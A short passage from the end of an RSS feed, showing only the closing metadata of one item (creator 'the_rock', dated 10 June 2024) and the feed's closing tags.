      <dc:creator>the_rock</dc:creator>
      <dc:date>2024-06-10T14:19:05Z</dc:date>
    </item>
  </channel>
</rss>

